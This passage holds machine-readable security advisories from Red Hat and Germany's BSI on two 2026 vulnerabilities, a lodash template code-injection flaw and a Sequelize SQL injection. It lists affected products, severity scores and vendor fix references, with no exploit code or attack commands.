"revision_history": [
{
"date": "2026-04-16T15:09:56+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-16T15:10:06+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-22T08:51:17+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Satellite 6.18",
"product": {
"name": "Red Hat Satellite 6.18",
"product_id": "Red Hat Satellite 6.18",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:satellite:6.18::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Satellite"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64",
"product": {
"name": "registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64",
"product_id": "registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/iop-remediations-rhel9@sha256%3A94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c?arch=amd64\u0026repository_url=registry.redhat.io/satellite\u0026tag=1776194798"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64 as a component of Red Hat Satellite 6.18",
"product_id": "Red Hat Satellite 6.18:registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64"
},
"product_reference": "registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64",
"relates_to_product_reference": "Red Hat Satellite 6.18"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-4800",
"cwe": {
"id": "CWE-94",
"name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
},
"discovery_date": "2026-03-31T20:01:21.918257+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2453496"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in lodash. The fix for CVE-2021-23337 added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink. Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "lodash: lodash: Arbitrary code execution via untrusted input in template imports",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In the context of Red Hat Enterprise Linux, the grafana and grafana-pcp packages execute the affected JavaScript entirely client-side within the user\u0027s browser. Consequently, the attack surface is strictly restricted to the local browser environment.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Satellite 6.18:registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-4800"
},
{
"category": "external",
"summary": "RHBZ#2453496",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453496"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-4800",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4800"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-35jh-r3h4-6jhm",
"url": "https://github.com/advisories/GHSA-35jh-r3h4-6jhm"
},
{
"category": "external",
"summary": "https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c",
"url": "https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c"
}
],
"release_date": "2026-03-31T19:25:55.987000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-16T15:09:56+00:00",
"details": "For Red Hat Lightspeed in Satellite installation see the Red Hat Satellite documentation.",
"product_ids": [
"Red Hat Satellite 6.18:registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8498"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Satellite 6.18:registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Satellite 6.18:registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "lodash: lodash: Arbitrary code execution via untrusted input in template imports"
},
{
"cve": "CVE-2026-30951",
"cwe": {
"id": "CWE-89",
"name": "Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)"
},
"discovery_date": "2026-03-10T21:01:17.729955+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2446250"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Sequelize, a Node.js Object-Relational Mapper (ORM) tool. A remote attacker can exploit a SQL injection vulnerability by manipulating JSON object keys during JSON/JSONB where clause processing. This allows for the injection of arbitrary SQL commands due to the improper handling of cast types. The primary consequence is the potential for unauthorized data exfiltration from any database table.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "sequelize: Sequelize: Data exfiltration via SQL injection in JSON/JSONB where clause processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Satellite 6.18:registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-30951"
},
{
"category": "external",
"summary": "RHBZ#2446250",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446250"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-30951",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-30951"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-30951",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30951"
},
{
"category": "external",
"summary": "https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr",
"url": "https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr"
}
],
"release_date": "2026-03-10T20:22:46.150000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-16T15:09:56+00:00",
"details": "For Red Hat Lightspeed in Satellite installation see the Red Hat Satellite documentation.",
"product_ids": [
"Red Hat Satellite 6.18:registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8498"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Satellite 6.18:registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Satellite 6.18:registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "sequelize: Sequelize: Data exfiltration via SQL injection in JSON/JSONB where clause processing"
}
]
}
WID-SEC-W-2026-1160
Vulnerability from csaf_certbund - Published: 2026-04-16 22:00 - Updated: 2026-05-20 22:00Summary
Red Hat Enterprise Linux und Satellite (satellite/iop-remediations-rhel9 container image): Mehrere Schwachstellen
Severity
Hoch
Notes
Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.
Produktbeschreibung: Red Hat Enterprise Linux (RHEL) ist eine populäre Linux-Distribution.
Red Hat Satellite dient als zentrale Stelle für das Management, die Verteilung von Updates in Netzwerken mit Red Hat Enterprise Linux Systemen.
Angriff: Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat Enterprise Linux und Red Hat Satellite ausnutzen, um Informationen offenzulegen oder beliebigen Code auszuführen.
Betroffene Betriebssysteme: - Linux
Affected products
Known affected
15 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat OpenShift Data Foundation 4.17.24
Red Hat / OpenShift
|
cpe:/a:redhat:openshift:data_foundation_4.17.24
|
Data Foundation 4.17.24 | |
|
Red Hat OpenShift Network Observability 1.11.2
Red Hat / OpenShift
|
cpe:/a:redhat:openshift:network_observability_1.11.2
|
Network Observability 1.11.2 | |
|
Red Hat OpenShift Data Foundation 4.16.26
Red Hat / OpenShift
|
cpe:/a:redhat:openshift:data_foundation_4.16.26
|
Data Foundation 4.16.26 | |
|
Red Hat OpenShift Data Foundation 4.18.20
Red Hat / OpenShift
|
cpe:/a:redhat:openshift:data_foundation_4.18.20
|
Data Foundation 4.18.20 | |
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Red Hat Satellite 6.18
Red Hat / Satellite
|
cpe:/a:redhat:satellite:6.18
|
6.18 | |
|
Red Hat Enterprise Linux 9
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:9
|
9 | |
|
Red Hat OpenShift Container Platform <4.17.54
Red Hat / OpenShift
|
Container Platform <4.17.54 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
HCL BigFix WebUI
HCL / BigFix
|
cpe:/a:hcltech:bigfix:webui
|
WebUI | |
|
RESF Rocky Linux
RESF
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
Red Hat OpenShift Container Platform <4.18.42
Red Hat / OpenShift
|
Container Platform <4.18.42 | ||
|
Fedora Linux
Fedora
|
cpe:/o:fedoraproject:fedora:-
|
— | |
|
Red Hat OpenShift Container Platform <4.20.23
Red Hat / OpenShift
|
Container Platform <4.20.23 | ||
|
IBM MQ
IBM
|
cpe:/a:ibm:mq:-
|
— |
Affected products
Known affected
15 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
Red Hat OpenShift Data Foundation 4.17.24
Red Hat / OpenShift
|
cpe:/a:redhat:openshift:data_foundation_4.17.24
|
Data Foundation 4.17.24 | |
|
Red Hat OpenShift Network Observability 1.11.2
Red Hat / OpenShift
|
cpe:/a:redhat:openshift:network_observability_1.11.2
|
Network Observability 1.11.2 | |
|
Red Hat OpenShift Data Foundation 4.16.26
Red Hat / OpenShift
|
cpe:/a:redhat:openshift:data_foundation_4.16.26
|
Data Foundation 4.16.26 | |
|
Red Hat OpenShift Data Foundation 4.18.20
Red Hat / OpenShift
|
cpe:/a:redhat:openshift:data_foundation_4.18.20
|
Data Foundation 4.18.20 | |
|
Red Hat Enterprise Linux
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:-
|
— | |
|
Red Hat Satellite 6.18
Red Hat / Satellite
|
cpe:/a:redhat:satellite:6.18
|
6.18 | |
|
Red Hat Enterprise Linux 9
Red Hat / Enterprise Linux
|
cpe:/o:redhat:enterprise_linux:9
|
9 | |
|
Red Hat OpenShift Container Platform <4.17.54
Red Hat / OpenShift
|
Container Platform <4.17.54 | ||
|
Oracle Linux
Oracle
|
cpe:/o:oracle:linux:-
|
— | |
|
HCL BigFix WebUI
HCL / BigFix
|
cpe:/a:hcltech:bigfix:webui
|
WebUI | |
|
RESF Rocky Linux
RESF
|
cpe:/o:resf:rocky_linux:-
|
— | |
|
Red Hat OpenShift Container Platform <4.18.42
Red Hat / OpenShift
|
Container Platform <4.18.42 | ||
|
Fedora Linux
Fedora
|
cpe:/o:fedoraproject:fedora:-
|
— | |
|
Red Hat OpenShift Container Platform <4.20.23
Red Hat / OpenShift
|
Container Platform <4.20.23 | ||
|
IBM MQ
IBM
|
cpe:/a:ibm:mq:-
|
— |
References
42 references
{
"document": {
"aggregate_severity": {
"text": "hoch"
},
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "de-DE",
"notes": [
{
"category": "legal_disclaimer",
"text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
},
{
"category": "description",
"text": "Red Hat Enterprise Linux (RHEL) ist eine popul\u00e4re Linux-Distribution.\r\nRed Hat Satellite dient als zentrale Stelle f\u00fcr das Management, die Verteilung von Updates in Netzwerken mit Red Hat Enterprise Linux Systemen.",
"title": "Produktbeschreibung"
},
{
"category": "summary",
"text": "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Red Hat Enterprise Linux und Red Hat Satellite ausnutzen, um Informationen offenzulegen oder beliebigen Code auszuf\u00fchren.",
"title": "Angriff"
},
{
"category": "general",
"text": "- Linux",
"title": "Betroffene Betriebssysteme"
}
],
"publisher": {
"category": "other",
"contact_details": "csaf-provider@cert-bund.de",
"name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
"namespace": "https://www.bsi.bund.de"
},
"references": [
{
"category": "self",
"summary": "WID-SEC-W-2026-1160 - CSAF Version",
"url": "https://wid.cert-bund.de/.well-known/csaf/white/2026/wid-sec-w-2026-1160.json"
},
{
"category": "self",
"summary": "WID-SEC-2026-1160 - Portal Version",
"url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-1160"
},
{
"category": "external",
"summary": "RedHat Security Advisory vom 2026-04-16",
"url": "https://access.redhat.com/errata/RHSA-2026:8498"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:10131 vom 2026-04-23",
"url": "https://access.redhat.com/errata/RHSA-2026:10131"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:10175 vom 2026-04-23",
"url": "https://access.redhat.com/errata/RHSA-2026:10175"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:10713 vom 2026-04-27",
"url": "https://access.redhat.com/errata/RHSA-2026:10713"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:10710 vom 2026-04-27",
"url": "https://access.redhat.com/errata/RHSA-2026:10710"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-10710 vom 2026-04-27",
"url": "https://linux.oracle.com/errata/ELSA-2026-10710.html"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2026:10710 vom 2026-04-28",
"url": "https://errata.build.resf.org/RLSA-2026:10710"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:11493 vom 2026-04-29",
"url": "https://access.redhat.com/errata/RHSA-2026:11493"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:11471 vom 2026-04-29",
"url": "https://access.redhat.com/errata/RHSA-2026:11471"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:11470 vom 2026-04-29",
"url": "https://access.redhat.com/errata/RHSA-2026:11470"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:11516 vom 2026-04-29",
"url": "https://access.redhat.com/errata/RHSA-2026:11516"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-10713 vom 2026-04-28",
"url": "https://linux.oracle.com/errata/ELSA-2026-10713.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:11454 vom 2026-04-29",
"url": "https://access.redhat.com/errata/RHSA-2026:11454"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:11469 vom 2026-04-29",
"url": "https://access.redhat.com/errata/RHSA-2026:11469"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:11494 vom 2026-04-29",
"url": "https://access.redhat.com/errata/RHSA-2026:11494"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:11495 vom 2026-04-29",
"url": "https://access.redhat.com/errata/RHSA-2026:11495"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:12277 vom 2026-04-30",
"url": "https://access.redhat.com/errata/RHSA-2026:12277"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:12279 vom 2026-04-30",
"url": "https://access.redhat.com/errata/RHSA-2026:12279"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:13553 vom 2026-05-04",
"url": "https://access.redhat.com/errata/RHSA-2026:13553"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:13571 vom 2026-05-05",
"url": "https://access.redhat.com/errata/RHSA-2026:13571"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:13545 vom 2026-05-04",
"url": "https://access.redhat.com/errata/RHSA-2026:13545"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:13826 vom 2026-05-05",
"url": "https://access.redhat.com/errata/RHSA-2026:13826"
},
{
"category": "external",
"summary": "Fedora Security Advisory FEDORA-2026-301CBBE347 vom 2026-05-08",
"url": "https://bodhi.fedoraproject.org/updates/FEDORA-2026-301cbbe347"
},
{
"category": "external",
"summary": "Fedora Security Advisory FEDORA-2026-793B55138D vom 2026-05-08",
"url": "https://bodhi.fedoraproject.org/updates/FEDORA-2026-793b55138d"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:14870 vom 2026-05-07",
"url": "https://access.redhat.com/errata/RHSA-2026:14870"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:14871 vom 2026-05-07",
"url": "https://access.redhat.com/errata/RHSA-2026:14871"
},
{
"category": "external",
"summary": "HCL Security Bulletin",
"url": "https://support.hcl-software.com/csm?id=kb_article\u0026sysparm_article=KB0130587"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:16874 vom 2026-05-13",
"url": "https://access.redhat.com/errata/RHSA-2026:16874"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17547 vom 2026-05-14",
"url": "https://access.redhat.com/errata/RHSA-2026:17547"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17550 vom 2026-05-14",
"url": "https://access.redhat.com/errata/RHSA-2026:17550"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17549 vom 2026-05-14",
"url": "https://access.redhat.com/errata/RHSA-2026:17549"
},
{
"category": "external",
"summary": "IBM Security Bulletin 7273145 vom 2026-05-15",
"url": "https://www.ibm.com/support/pages/node/7273145"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19008 vom 2026-05-19",
"url": "https://access.redhat.com/errata/RHSA-2026:19008"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19410 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19410"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19167 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:19167"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17469 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:17469"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17468 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:17468"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17448 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:17448"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:19712 vom 2026-05-21",
"url": "https://access.redhat.com/errata/RHSA-2026:19712"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:17598 vom 2026-05-20",
"url": "https://access.redhat.com/errata/RHSA-2026:17598"
}
],
"source_lang": "en-US",
"title": "Red Hat Enterprise Linux und Satellite (satellite/iop-remediations-rhel9 container image): Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2026-05-20T22:00:00.000+00:00",
"generator": {
"date": "2026-05-21T07:57:16.239+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.6.0"
}
},
"id": "WID-SEC-W-2026-1160",
"initial_release_date": "2026-04-16T22:00:00.000+00:00",
"revision_history": [
{
"date": "2026-04-16T22:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2026-04-23T22:00:00.000+00:00",
"number": "2",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2026-04-26T22:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2026-04-27T22:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von Rocky Enterprise Software Foundation aufgenommen"
},
{
"date": "2026-04-28T22:00:00.000+00:00",
"number": "5",
"summary": "Neue Updates von Red Hat und Oracle Linux aufgenommen"
},
{
"date": "2026-05-03T22:00:00.000+00:00",
"number": "6",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2026-05-04T22:00:00.000+00:00",
"number": "7",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2026-05-05T22:00:00.000+00:00",
"number": "8",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2026-05-07T22:00:00.000+00:00",
"number": "9",
"summary": "Neue Updates von Fedora und Red Hat aufgenommen"
},
{
"date": "2026-05-10T22:00:00.000+00:00",
"number": "10",
"summary": "Neue Updates von HCL aufgenommen"
},
{
"date": "2026-05-14T22:00:00.000+00:00",
"number": "11",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2026-05-17T22:00:00.000+00:00",
"number": "12",
"summary": "Neue Updates von IBM aufgenommen"
},
{
"date": "2026-05-19T22:00:00.000+00:00",
"number": "13",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2026-05-20T22:00:00.000+00:00",
"number": "14",
"summary": "Neue Updates von Red Hat aufgenommen"
}
],
"status": "final",
"version": "14"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Fedora Linux",
"product": {
"name": "Fedora Linux",
"product_id": "74185",
"product_identification_helper": {
"cpe": "cpe:/o:fedoraproject:fedora:-"
}
}
}
],
"category": "vendor",
"name": "Fedora"
},
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "WebUI",
"product": {
"name": "HCL BigFix WebUI",
"product_id": "T036098",
"product_identification_helper": {
"cpe": "cpe:/a:hcltech:bigfix:webui"
}
}
}
],
"category": "product_name",
"name": "BigFix"
}
],
"category": "vendor",
"name": "HCL"
},
{
"branches": [
{
"category": "product_name",
"name": "IBM MQ",
"product": {
"name": "IBM MQ",
"product_id": "T021398",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:mq:-"
}
}
}
],
"category": "vendor",
"name": "IBM"
},
{
"branches": [
{
"category": "product_name",
"name": "Oracle Linux",
"product": {
"name": "Oracle Linux",
"product_id": "T004914",
"product_identification_helper": {
"cpe": "cpe:/o:oracle:linux:-"
}
}
}
],
"category": "vendor",
"name": "Oracle"
},
{
"branches": [
{
"category": "product_name",
"name": "RESF Rocky Linux",
"product": {
"name": "RESF Rocky Linux",
"product_id": "T032255",
"product_identification_helper": {
"cpe": "cpe:/o:resf:rocky_linux:-"
}
}
}
],
"category": "vendor",
"name": "RESF"
},
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
},
{
"category": "product_version",
"name": "9",
"product": {
"name": "Red Hat Enterprise Linux 9",
"product_id": "T052941",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:9"
}
}
}
],
"category": "product_name",
"name": "Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "Network Observability 1.11.2",
"product": {
"name": "Red Hat OpenShift Network Observability 1.11.2",
"product_id": "T054021",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:network_observability_1.11.2"
}
}
},
{
"category": "product_version",
"name": "Data Foundation 4.18.20",
"product": {
"name": "Red Hat OpenShift Data Foundation 4.18.20",
"product_id": "T054097",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:data_foundation_4.18.20"
}
}
},
{
"category": "product_version",
"name": "Data Foundation 4.16.26",
"product": {
"name": "Red Hat OpenShift Data Foundation 4.16.26",
"product_id": "T054098",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:data_foundation_4.16.26"
}
}
},
{
"category": "product_version",
"name": "Data Foundation 4.17.24",
"product": {
"name": "Red Hat OpenShift Data Foundation 4.17.24",
"product_id": "T054099",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:data_foundation_4.17.24"
}
}
},
{
"category": "product_version_range",
"name": "Container Platform \u003c4.20.23",
"product": {
"name": "Red Hat OpenShift Container Platform \u003c4.20.23",
"product_id": "T054390"
}
},
{
"category": "product_version",
"name": "Container Platform 4.20.23",
"product": {
"name": "Red Hat OpenShift Container Platform 4.20.23",
"product_id": "T054390-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:container_platform__4.20.23"
}
}
},
{
"category": "product_version_range",
"name": "Container Platform \u003c4.18.42",
"product": {
"name": "Red Hat OpenShift Container Platform \u003c4.18.42",
"product_id": "T054401"
}
},
{
"category": "product_version",
"name": "Container Platform 4.18.42",
"product": {
"name": "Red Hat OpenShift Container Platform 4.18.42",
"product_id": "T054401-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:container_platform__4.18.42"
}
}
},
{
"category": "product_version_range",
"name": "Container Platform \u003c4.17.54",
"product": {
"name": "Red Hat OpenShift Container Platform \u003c4.17.54",
"product_id": "T054403"
}
},
{
"category": "product_version",
"name": "Container Platform 4.17.54",
"product": {
"name": "Red Hat OpenShift Container Platform 4.17.54",
"product_id": "T054403-fixed",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:container_platform__4.17.54"
}
}
}
],
"category": "product_name",
"name": "OpenShift"
},
{
"branches": [
{
"category": "product_version",
"name": "6.18",
"product": {
"name": "Red Hat Satellite 6.18",
"product_id": "T052942",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:satellite:6.18"
}
}
}
],
"category": "product_name",
"name": "Satellite"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-30951",
"product_status": {
"known_affected": [
"T054099",
"T054021",
"T054098",
"T054097",
"67646",
"T052942",
"T052941",
"T054403",
"T004914",
"T036098",
"T032255",
"T054401",
"74185",
"T054390",
"T021398"
]
},
"release_date": "2026-04-16T22:00:00.000+00:00",
"title": "CVE-2026-30951"
},
{
"cve": "CVE-2026-4800",
"product_status": {
"known_affected": [
"T054099",
"T054021",
"T054098",
"T054097",
"67646",
"T052942",
"T052941",
"T054403",
"T004914",
"T036098",
"T032255",
"T054401",
"74185",
"T054390",
"T021398"
]
},
"release_date": "2026-04-16T22:00:00.000+00:00",
"title": "CVE-2026-4800"
}
]
}
